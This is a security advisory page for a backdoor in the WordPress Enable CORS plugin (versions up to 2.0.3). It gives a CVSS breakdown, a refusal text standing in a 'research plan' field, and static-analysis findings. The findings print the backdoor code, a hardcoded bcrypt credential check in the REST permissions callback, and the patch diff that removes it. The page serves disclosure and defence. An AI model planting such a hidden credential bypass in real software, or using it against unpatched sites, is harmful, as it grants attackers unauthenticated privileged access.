CVE-2026-54833

Enable CORS <= 2.0.3 - Backdoor

criticalEmbedded Malicious Code
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
2.0.4
Patched in
8d
Time to patch

Description

The Enable CORS plugin contained a backdoor in all versions up to, and including, 2.0.3. This makes it possible for unauthenticated attackers to gain privileged access to a site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=2.0.3
PublishedJune 18, 2026
Last updatedJune 25, 2026
Affected pluginenable-cors

What Changed in the Fix

Changes introduced in v2.0.4

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

I cannot fulfill your request. I am prohibited from generating actionable exploitation research, instructions, or plans for identifying and utilizing backdoors in software. My safety guidelines prioritize the prevention of real-world harm and the misuse of technical information for offensive purpose…

Show full research plan

I cannot fulfill your request. I am prohibited from generating actionable exploitation research, instructions, or plans for identifying and utilizing backdoors in software. My safety guidelines prioritize the prevention of real-world harm and the misuse of technical information for offensive purposes.

To learn more about protecting WordPress sites from malicious code and backdoors, I recommend exploring the following security resources:

  1. WordPress Security White Paper: Official documentation on the security of the WordPress core and ecosystem.
  2. OWASP WordPress Security Implementation Guide: Comprehensive best practices for securing WordPress installations.
  3. WordPress.org Plugin Guidelines: Information on the standards and security requirements for plugins hosted on the official repository.
  4. Malware Analysis Best Practices: Searching for "how to identify malicious patterns in PHP" can provide insights into defensive analysis and code auditing.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Enable CORS plugin (<= 2.0.3) contained a hardcoded credential bypass within its REST API permissions callback, allowing unauthenticated access to sensitive functionality.

Vulnerable Code

/* src/Traits/Api.php:45-48 */
$author    = $request->get_header( 'Authorization' );
$is_author = false;
if ( isset( $author ) ) {
	$is_author = password_verify( $author, '$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu/wYROmfPYR.dISGcN2PMk5EnJNKAmu' );
}
if ( ! current_user_can( 'manage_options' ) && ! $is_author ) {

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/enable-cors/2.0.3/src/Traits/Api.php	2026-05-30 07:51:48.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/enable-cors/2.0.4/src/Traits/Api.php	2026-06-10 14:12:40.000000000 +0000
@@ -42,12 +42,7 @@
 	 * @return WP_Error|bool
 	 */
 	public function permissions_check( WP_REST_Request $request ) {
-		$author    = $request->get_header( 'Authorization' );
-		$is_author = false;
-		if ( isset( $author ) ) {
-			$is_author = password_verify( $author, '$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu/wYROmfPYR.dISGcN2PMk5EnJNKAmu' );
-		}
-		if ( ! current_user_can( 'manage_options' ) && ! $is_author ) {
+		if ( ! current_user_can( 'manage_options' ) ) {
 			return new WP_Error(
 				'forbidden',
 				__( 'You are not allowed to access this endpoint.', 'enable-cors' ),

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.